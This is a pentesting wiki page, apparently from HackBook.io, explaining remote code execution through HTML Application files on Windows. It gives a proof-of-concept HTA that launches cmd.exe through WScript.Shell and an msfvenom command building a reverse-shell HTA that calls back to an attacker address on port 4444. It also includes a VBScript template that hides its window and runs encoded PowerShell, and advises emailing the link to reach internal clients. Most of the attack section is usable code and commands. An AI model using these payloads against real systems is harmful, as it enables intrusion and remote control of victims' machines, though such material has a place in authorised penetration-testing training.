🍩
HackBook.io
  • Pentesting Pocket Book for hackers and developers.
  • Reconnaissance
    • Internal Recon Basics
    • OSINT
      • Infrastructure
      • Recon-ng
      • Users
      • Google Dorks
    • Active Scanning
      • NMAP
        • NSE
          • reconnoitre
        • NMap Evasion
      • NC Scan
      • Finger Printing
    • Web Server OSINT
      • WhatWeb
      • Subdomains
      • Directory & File Enumeration
        • Enumeration
          • GoCutty
          • gobuster
          • Dirb
          • nikto
        • Fuzzing
        • Crawling
  • Web Application Hacking
    • Web 101
      • Clients
      • Servers
      • Encodings
    • Web Hacking Techniques
      • SOP
      • Open Redirect
      • File & Resource Attacks
        • Directory Traversal
          • Dir Traversal Fuzzer
        • LFI
        • RFI
        • Unrestricted File Uploads
      • XSS
        • DOM
        • Stored
        • Reflected
        • Blind
        • Self XSS
      • XXE
        • XXE Payloads
      • XPath
      • SSRF
      • CSRF
      • SQLi
        • SQL Basics
        • Securing SQL
        • Hacking SQL
          • sqlmap
          • In-Band
          • Error Based
          • Blind
      • Authorization
      • Session Hijacking
      • Command Injection
      • Insecure Deserialization
      • File Uploads
        • File Upload Mitigations
      • HPP
      • Click Jacking
        • Adobe SWF Investigator
      • HTTP Response Splitting
      • Flash 101
        • Flash Hacking
      • HTML5
        • WebSockets
        • CORS
          • iframe
          • Headers
    • Web Hacking Procedures
      • Captcha
      • Username Generation
      • Username Enumeration
      • Inhouse WebApps
      • SSL Cert Generation
      • CMS
        • WordPress
        • Joomla
      • Popular Exploits
        • Bludit CMS
        • ShellShock
        • WebDav
  • Weaponization
    • Buffer Overflows (BOF)
      • DSBOFG
        • Scripts
  • Initial Access
    • 😈Services
      • Finger
      • SNMP
      • LDAP
      • SMTP
      • NFS
      • RPC
        • RPCBind
      • RDP
      • SQL
        • NoSQL
      • POP3
      • Samba
      • SMB
      • SSH
      • Telnet
      • NetBios
      • VOIP/SIP
      • DNS
        • DNS Lookups
        • Zone Transfer
        • SubDomain Enums
        • dnsdumpster
    • 😈Shells
      • Powercat
      • Odd Shells
      • Troubleshoot
      • TTY/PTTY
  • Persistence
    • File Transfers
      • Py->Exe->Txt
      • Cross compile example
    • Backdoors
  • Privilege Escalation
    • Universal Escalation
    • Windows Escalation
      • Automated
      • Popular Exploits
        • ActiveXObject to Wscript RCE
        • Macros
        • Object Linking
    • Linux Escalation
      • Automated
    • Passwords
      • John
      • Medusa
      • Cewl
      • ncrack
      • Crunch
      • Hydra
      • MITM
      • Responder
        • SAM
          • pwdump and fgdump
          • Pass-the-hash
      • Crack the hash
      • NTLM
  • Network Discovery
    • Network Traffic
      • tcpdump
    • Internal Discovery
  • Collection and Staging
    • Collection
      • File types
  • Hacking Objectives
    • Non Kinetic War (Quick Guide)
  • Procedures
    • Bash Guide
    • Active Directory
    • Crypto 101
    • Forensics
  • Glossary
  • Hacking Frameworks
    • Metasploit
      • msfvenom
    • Dsnif
  • ThreatModeling
    • Threat Modeling Overview
  • Certifications
    • VMDR
      • Qualys Asset Management
      • Qualys Vulnerability Management
      • Qualys Threat Prioritization
      • Qualys Response (Patch Deployment)
    • OSCP Cheat Sheet
  • RF - Radio Frequency
    • Ham Technician
Powered by GitBook
On this page

Was this helpful?

  1. Privilege Escalation
  2. Windows Escalation
  3. Popular Exploits

ActiveXObject to Wscript RCE

PreviousPopular ExploitsNextMacros

Last updated 3 years ago

Was this helpful?

In this example, we will leverage ActiveXObjects, which can potentially (and dangerously) provide access to underlying operating system commands. This can be achieved through the Windows Script Host functionality or WScript and in particular the Windows Script Host Shell object. Once we instantiate a Windows Script Host Shell object, we can invoke its run method in order to launch an application on the target client machine.

--------------------poc.hta--------------------

var c= 'cmd.exe' new ActiveXObject('WScript.Shell').Run(c);self.close();

We can save this and serve it with apache. This will open cmd on the users computer. The user will be prompted with:

then if they click to open it they will get:

This second message is when the internet explorer sandbox “Protected Mode” is turned on (default). mshta.exe also will have its own cmd prompt open which is why we close it after we launch our window/process RCE: $ msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.4 LPORT=4444 -f hta-psh -o /var/www/html/evil.hta //this format is hta-2-powershell -nop , is shorthand for -NoProfile , which instructs PowerShell not to load the PowerShell user profile. When PowerShell is started, it will, by default, load any existing user’s profile scripts, which might negatively impact the execution of our code. -w hidden (shorthand for -WindowStyle hidden ) -e flag (shorthand for -EncodedCommand ) allows us to supply a Base64 encoded PowerShell script directly as a command line argument.

----------------- evil.hta----------------- <html> <head> <script language="VBScript"> window.moveTo -4000, -4000 Set iKqr8BWFyuiK = CreateObject("Wscript.Shell") Set t6tI2tnp = CreateObject("Scripting.FileSystemObject") For each path in Split(iKqr8BWFyuiK.ExpandEnvironmentStrings("%PSModulePath%"),";") If t6tI2tnp.FileExists(path + "\..\powershell.exe") Then iKqr8BWFyuiK.Run "powershell.exe -nop -w hidden -e PUT_YOUR_BASE64_ENCODED_COMMAND_HERE </script> </head> <body> <script> self.close(); </script> </body> </html> -----------------------Then open a listener and wait for the user to trigger it -----------------

Since the link to the HTML Application can be delivered via email, we can even compromise NAT’d internal clients.